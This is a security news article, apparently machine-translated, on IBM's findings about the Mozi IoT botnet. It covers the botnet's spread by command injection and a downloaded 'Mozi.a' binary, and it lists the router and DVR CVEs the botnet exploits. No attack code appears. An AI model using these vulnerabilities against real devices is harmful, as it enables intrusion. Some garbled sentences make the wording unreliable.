Friday, January 15, 16:43
Home security Mozi botnet: Responsible for most attacks on IoT devices

Mozi botnet: Responsible for most attacks on IoT devices

According to IBMThe Mozi, a relatively new one botnet is responsible for increase in Internet of Things (IoT) botnet activity.

Mozi botnet

The Mozi botnet has been used a lot in the last year and represented it 90% of IoT network traffic, observed between October 2019 and June 2020. However, the researchers found that it carried out attacks without trying to remove its competitors from breached systems.

On the other hand, the large increase in IoT attacks Appliances is not solely due to the effectiveness of the botnet. It is largely due to increased use of IoT devices worldwide. More Appliances mean more opportunities for attacks. According to IBM, there are about 31 billion IoT devices worldwide.

Researchers believe that the success of the Mozi botnet is based on usage "Command injection (CMDi)" attacks, which are based on incorrect configurations on IoT devices. The combination of increased use of IoT devices and incorrect protocols is responsible for increasing attacks. Of course, the prolonged remote work due to COVID-19, also plays an important role.

The researchers observed that almost all attacks targeting IoT devices use the CMDi technique for initial access. Mozi botnet utilizes CMDi using a "wget" shell command and then violates the rights to facilitate the intruders' interaction with the target system.

IBM said that on vulnerable devices, a file with the name was downloaded “Mozi.a” and then executed in MIPS architecture. The attack targets machines that use RISC computer architecture (MIPS is a "RISC instruction set architecture") and can enable a hacker to modify the firmware for installation of additional malware.

Mozi botnet targets many vulnerabilities to infect IoT devices: CVE-2017-17215 (Huawei HG532), CVE-2018-10561 / CVE-2018-10562 (GPON Routers), CVE-2014-8361 (Realtek SDK), CVE -2008-4873 (Sepal SPBOARD), CVE-2016-6277 (Netgear R7000 / R6400), CVE-2015-2051 (D-Link Devices), Eir D1000 wireless router command injection, Netgear setup.cgi RCE, execution of MVPower DVR commands , execute D-Link UPnP SOAP and RCE commands that affect many CCTV-DVR vendors.

 and production

The hackers behind Mozi botnet use infrastructure located mainly in China (84%).

"Mozi botnet is a peer-to-peer (P2P) botnet based on the distributed sloppy hash table (DSHT) protocol, which can be spread through exploits of IoT devices and weak telnet passwordsSays IBM.

According to IBM, the botnet can be used for realization denial-of-service attacks (DDoS), for execution of malicious commands, The perform additional payloads and collection of information.

In accordance with SecurityWeek, researchers stress that organizations that use IoT devices need to address this increasingly common threat. The "Command injection"Remains the main form of infection, so it is important to change the default settings of the device and make continuous checks to find possible gaps security.


Please enter your comment!
Please enter your name here

Digital Fortress
Digital Fortress
Pursue Your Dreams & Live!


Ransomware is responsible for half of all data breaches in hospitals

Almost half of the data breaches committed in hospitals and the wider healthcare sector are due to ransomware attacks, ...

Astronomers have just found the oldest oversized black hole

A quasar was discovered in a dark corner of space - over 13,03 billion light-years away - and contains a ...

What are the best and most affordable 5G phones for 2021

The market will soon be flooded with mid-range 5G devices. Everything that happens will be really exciting: you will be able to ...

Verified Twitter accounts in a cryptocurrency scam with the name of Elon Musk violated!

Lately, hackers have been violating verified Twitter accounts in a cryptocurrency giveaway scam, in which the name of the CEO is used ...

Classiscam: Fraudsters "fake" brands and deceive users of European markets!

Dozens of criminal gangs publish fake ads in popular online markets, to attract unsuspecting users to "fraudulent" commercial sites or phishing ...

iOS 14.4: Displays a notification for repairs with non-genuine cameras

Starting with the iPhone 11, Apple has added a notification to iOS that tells the user when the device has a ...

Facebook: Sues Chrome extensions developers for data theft

Facebook has filed a lawsuit against two Portuguese nationals for developing Chrome extensions that collected data from Facebook users.

Cisco does not fix 74 bugs in RV routers that have reached their EOL

Cisco said yesterday that it will not release firmware updates to fix 74 vulnerabilities that have been reported in ...

Hacker commits new crimes while waiting for his release!

A Kosovo hacker was pardoned after his conviction. The hacker provided personally identifiable information over 1.000 ...

Nintendo rules out Game & Watch video hacking

Two copyright claims against a YouTuber have been filed by Nintendo, for a video showing hacking of Super Mario ...